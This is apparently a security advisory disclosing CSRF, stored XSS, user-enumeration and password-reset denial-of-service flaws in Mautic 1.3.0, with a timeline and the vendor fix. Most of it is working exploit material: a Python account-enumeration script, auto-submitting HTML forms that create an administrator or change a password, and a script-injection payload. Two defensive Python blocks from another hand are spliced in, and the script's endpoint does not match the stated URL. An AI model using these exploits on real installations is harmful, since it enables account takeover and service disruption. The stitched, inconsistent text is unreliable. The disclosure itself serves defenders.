
Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS

Posted Apr 2, 2016
Authored by Mickael Dorigny

Mautic version 1.3.0 suffers from cross site request forgery, denial of service, user enumeration, and cross site scripting vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, csrf
MD5 | 9bc16ea934db5b9beb8349d22a4a4833

######################################################################
# Exploit Title: Mautic v1.3.0 Multiple Vulnerabilities
# Date: 01/04/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.mautic.org/
# Version: 1.3.0
# Category: Multiple Vulnerabilities
######################################################################

Mautic description :
======================================================================
Mautic is an open source marketing automation platform.

Vulnerabilities description :
======================================================================
Mautic version 1.3.0 is affected by the following vulnerabilities:
- User Enumeration
- DOS attack
- CSRF (x3)
- Stored XSS

PoC n°1 : User Enumeration
============================================
The password reset process allows an attacker to submit a large number of usernames/mail addresses and learn which of them are valid. This gives an attacker a list of valid accounts on the Mautic installation, against which a brute force attack can then be run.

PoC :
[URL]
http://MauticServer/s/passwordcheck
[POSTDATA]
passwordreset[identifier]=user&passwordreset[submit]=&passwordreset[_token]=pOiK8nnVsPHkYO2pjJx9iz1jrioXOi0Q7GAdxgEk6jU

When a username/mail is valid, the response of the server is :
"A new password has been generated and will be emailed to you. If you do not receive it within a few minutes, check your spam box and/or contact the system administrator."

When a username/mail isn't valid, the response of the server is :
"No user could be identified with the given value. "

This vulnerability can be exploited with the following python script :

import requests, time, sys, re

IPServ = "http://10.2.0.109"
if len(sys.argv) > 1:
    inputFile = sys.argv[1]
else:
    print "[*] Usage : python " + sys.argv[0] + " <user file>"
    exit(0)
URL1 = IPServ + '/passwordreset'   # GET: fetch the form and its CSRF token
URL2 = IPServ + '/passwordreset'   # POST: submit the identifier
with open(inputFile) as f:
    for username in f:
        username = username.strip()
        print "[?] Test if " + username + " exists..."
        session = requests.Session()
        r1 = session.get(URL1)
        # value of the form's passwordreset[_token] hidden field
        token = re.search("token].*value=\"(.*)\"", r1.text, re.IGNORECASE)
        data = {"passwordreset[identifier]": username,
                "passwordreset[submit]": "",
                "passwordreset[_token]": token.group(1)}
        r2 = session.post(URL2, data=data)
        # the error text is only returned for unknown identifiers
        if r2.text.find("No user could be identified with the given value") == -1:
            print "[+] the user [" + username + "] exists !"
        else:
            print "[-] Nope ..."

So an attacker can exploit this response difference to perform user enumeration.

PoC n°2 : partial DOS - reset user password
============================================
The password reset process can be used to mount a partial DOS attack. This is a logical attack: the reset password process isn't correctly implemented.

For a valid username/mail given to the reset password form, the password is immediately reset to a random password sent by mail. A correct implementation would first ask for a mail validation and only change the password once the user has confirmed.

This logical attack allows an attacker to reset every password of the Mautic installation. This degrades the user experience (especially if the attacker runs the attack continuously), saturates the HelpDesk, interrupts the service for users, etc.

This vulnerability can be exploited massively using the python script shown above, or manually against a single targeted account.

Note that all the valid usernames/mails can be found through the "User Enumeration" vulnerability described above.
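The reset flow the advisory recommends (confirmation by mail before any password change, and one identical response whether or not the identifier exists) modelled in Python. This is an added example, not Mautic's code or the author's script; the in-memory USERS/PASSWORDS tables, the SENT mailer stand-in and the 15-minute token lifetime are constructed assumptions.

```python
import secrets
import time

# Constructed in-memory stand-ins for Mautic's user table and mailer.
USERS = {"admin": "admin@example.com", "alice": "alice@example.com"}
PASSWORDS = {"admin": "old-admin-pw", "alice": "old-alice-pw"}
SENT = []                     # (address, token) pairs the "mailer" delivered
PENDING = {}                  # token -> (username, expiry timestamp)
TOKEN_TTL = 15 * 60           # assumed: confirmation link valid for 15 minutes

# The same text is returned for known and unknown identifiers, so the
# response difference relied on in PoC n°1 disappears.
UNIFORM_MSG = ("If an account matches the given value, a confirmation link "
               "has been sent to its registered address.")


def request_reset(identifier, now=None):
    """Step 1: do NOT touch the password; only mail a single-use token."""
    now = time.time() if now is None else now
    user = next((u for u, mail in USERS.items()
                 if identifier in (u, mail)), None)
    if user is not None:
        token = secrets.token_urlsafe(32)
        PENDING[token] = (user, now + TOKEN_TTL)
        SENT.append((USERS[user], token))   # stand-in for real mail delivery
    # Identical in both branches (a production version would also equalise
    # the time taken by the two paths).
    return UNIFORM_MSG


def confirm_reset(token, new_password, now=None):
    """Step 2: the password changes only when the mailed token comes back
    and before it expires. Returns True on success, False otherwise."""
    now = time.time() if now is None else now
    entry = PENDING.pop(token, None)        # single use: consumed either way
    if entry is None:
        return False
    user, expiry = entry
    if now > expiry:
        return False
    PASSWORDS[user] = new_password
    return True


if __name__ == "__main__":
    # A valid and an invalid identifier yield byte-identical responses,
    # and neither request changes any stored password.
    print(request_reset("admin") == request_reset("nobody@example.com"))
    print(PASSWORDS["admin"])                # still the old password
```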

PoC n°3 : CSRF on user/admin creation
============================================
The user creation process isn't protected against CSRF. An attacker can force an administrator to create a new user and/or a new administrator using basic social engineering techniques. The victim only has to visit a page controlled by the attacker, which makes the victim's browser issue the crafted request.

PoC :
[URL]
http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57

[POSTDATA]
user[firstName]=AZEAA&user[lastName]=AAA&user[role]=1&user[position]=&user[signature]=Best+regards,+|FROM_NAME|&user[username]=AZEAZEAAA&user[email]=azeaze@azeaaze.fr&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[timezone]=&user[locale]=&user[isPublished]=1&user[buttons][apply]=

The following HTML file contains an auto-submit form that sends the correct URL and parameters to the targeted Mautic to create a new user :
<html><body>
<form method=POST action='http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57'>
<input type=hidden name='user[firstName]' value='userpp'>
<input type=hidden name='user[lastName]' value='userpp'>
<input type=hidden name='user[role]' value='1'>
<input type=hidden name='user[position]' value=''>
<input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
<input type=hidden name='user[username]' value='userpp'>
<input type=hidden name='user[email]' value='userpp@userpp.fr'>
<input type=hidden name='user[plainPassword][password]' value='321321'>
<input type=hidden name='user[plainPassword][confirm]' value='321321'>
<input type=hidden name='user[timezone]' value=''>
<input type=hidden name='user[locale]' value=''>
<input type=hidden name='user[isPublished]' value='1'>
<input type=hidden name='user[buttons][apply]' value=''>
<input style="display:none" type=submit>
</form>
<script>document.forms[0].submit();</script>
</body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by making an administrator create another administrator with pre-defined login and password.

PoC n°4 : CSRF on password change
============================================
The password changing process isn't protected against CSRF. An attacker can force a user or an administrator to change their password using basic social engineering techniques. The victim only has to visit a page controlled by the attacker, which makes the victim's browser issue the crafted request.

PoC :
[URL]
http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48
[POSTDATA]
user[username]=user&user[firstName]=UserName&user[lastName]=LastName&user[position]=&user[email]=user@example.com&user[timezone]=&user[locale]=&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[signature]=Best+regards,+|FROM_NAME|&user[unlockModel]=user.user&user[unlockId]=1&user[buttons][save]=

The following HTML file contains an auto-submit form that sends the correct URL and parameters to the targeted Mautic to change the user's password :

<html><body>
<form method=POST action='http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48'>
<input type=hidden name='user[username]' value='userpp'>
<input type=hidden name='user[firstName]' value='userpp'>
<input type=hidden name='user[lastName]' value='userpp'>
<input type=hidden name='user[position]' value=''>
<input type=hidden name='user[email]' value='userpp@userpp.fr'>
<input type=hidden name='user[timezone]' value=''>
<input type=hidden name='user[locale]' value=''>
<input type=hidden name='user[plainPassword][password]' value='987987'>
<input type=hidden name='user[plainPassword][confirm]' value='987987'>
<input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
<input type=hidden name='user[unlockModel]' value='user.user'>
<input type=hidden name='user[unlockId]' value='1'>
<input type=hidden name='user[buttons][save]' value=''>
<input style="display:none" type=submit>
</form>
<script>document.forms[0].submit();</script>
</body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by forcing an administrator to change his password and then logging in with the admin account.

PoC n°5 : Stored XSS Landing Page
============================================
The landing page "Title" and "Custom Html Content" inputs are vulnerable to Stored XSS. A JavaScript payload placed there is executed in the browser of any user or admin who views the page.

PoC :
[URL]
http://MauticServer/s/pages/edit/1?mauticUserLastActive=1&mauticLastNotificationId=36
[POSTDATA]
page[title]=Page01+<script>alert(0);</script>&page[alias]=page01Page01+<img+src="X"+/>&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page01+<script>alert(0);</script></p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[unlockModel]=page.page&page[unlockId]=1&page[buttons][apply]=

Through this vulnerability, an attacker could tamper with page rendering, redirect victims to a fake login page, or steal user credentials such as cookies, especially the admin's.

PoC n°6 : CSRF Landing page creation
============================================
The landing page creation process isn't protected against CSRF. An attacker can force a user or an administrator to create a new landing page using basic social engineering techniques. The victim only has to visit a page controlled by the attacker, which makes the victim's browser issue the crafted request.

PoC:
[URL]
http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69
[POSTDATA]
page[title]=Page02&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page02</p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[buttons][apply]=

The following HTML file contains an auto-submit form that sends the correct URL and parameters to the targeted Mautic to create a new landing page :

<html><body>
<form method=POST action='http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69'>
<input type=hidden name='page[title]' value='Page03'>
<input type=hidden name='page[alias]' value='page02Page02'>
<input type=hidden name='page[template]' value=''>
<input type=hidden name='page[customHtml]' value='<html>
<head>
<title></title>
</head>
<body>
<p>Page02</p>
</body>
</html>
'>
<input type=hidden name='page[category]' value=''>
<input type=hidden name='page[language]' value='en'>
<input type=hidden name='page[translationParent]' value=''>
<input type=hidden name='page[isPublished]' value='1'>
<input type=hidden name='page[publishUp]' value=''>
<input type=hidden name='page[publishDown]' value=''>
<input type=hidden name='page[metaDescription]' value=''>
<input type=hidden name='page[sessionId]' value='1'>
<input type=hidden name='page[redirectType]' value=''>
<input type=hidden name='page[redirectUrl]' value=''>
<input type=hidden name='page[buttons][apply]' value=''>
<input style="display:none" type=submit>
</form>
<script>document.forms[0].submit();</script>
</body></html>

Note that this vulnerability can be combined with the "Stored XSS Landing page" vulnerability to build a privilege escalation scenario from an external position without any privilege.
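The server-side check that would have stopped PoC n°3, n°4 and n°6, as an added Python example (not Mautic's code): a per-session synchronizer token that the legitimate form must echo back, backed by an Origin/Referer check. The field name user[_token], the session store and the http://MauticServer origin are assumptions modelled on the passwordreset[_token] field visible in PoC n°1; the request body is a constructed copy of the PoC n°3 POSTDATA.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

SITE_ORIGIN = "http://MauticServer"     # placeholder host from the advisory
SESSION_TOKENS = {}                     # session id -> CSRF token, server side

# Constructed copy of the user-creation body from PoC n°3: no token field.
POC_BODY = ("user[firstName]=AZEAA&user[lastName]=AAA&user[role]=1"
            "&user[username]=AZEAZEAAA&user[email]=azeaze@azeaaze.fr"
            "&user[plainPassword][password]=321321"
            "&user[plainPassword][confirm]=321321&user[isPublished]=1")


def issue_csrf_token(session_id):
    """Called when rendering the real form: one random token per session,
    embedded as a hidden field (assumed name user[_token])."""
    return SESSION_TOKENS.setdefault(session_id, secrets.token_urlsafe(32))


def csrf_check(session_id, headers, body):
    """Gate for a state-changing POST. Returns (accepted, reason).

    An auto-submitted form on an attacker's page rides on the victim's
    session cookie but cannot read the token, and the browser stamps the
    request with the attacker's Origin, so either check rejects it."""
    form = parse_qs(body, keep_blank_values=True)
    submitted = form.get("user[_token]", [""])[0]
    expected = SESSION_TOKENS.get(session_id, "")
    if not expected or not hmac.compare_digest(submitted.encode(),
                                               expected.encode()):
        return False, "missing or wrong user[_token]"
    src = urlparse(headers.get("Origin") or headers.get("Referer", ""))
    if f"{src.scheme}://{src.netloc}" != SITE_ORIGIN:
        return False, "cross-site Origin/Referer"
    return True, "ok"


if __name__ == "__main__":
    # Forged request (PoC n°3 shape) versus the genuine one from our own page.
    print(csrf_check("victim", {"Origin": "http://attacker.example"}, POC_BODY))
    tok = issue_csrf_token("victim")
    print(csrf_check("victim", {"Origin": SITE_ORIGIN},
                     POC_BODY + "&user[_token]=" + tok))
```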

Solution:
======================================================================

Update your Mautic installation to a newer version (version 1.3.1 can be found here : https://github.com/mautic/mautic/releases/tag/1.3.1).


Additional resources :
======================================================================
- https://youtu.be/TOZOwOYqZ34


Report timeline :
======================================================================
2016-03-16 : Editor informed of the vulnerabilities
2016-03-19 : Editor fixes the vulnerabilities and releases a new version
2016-04-01 : Advisory release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr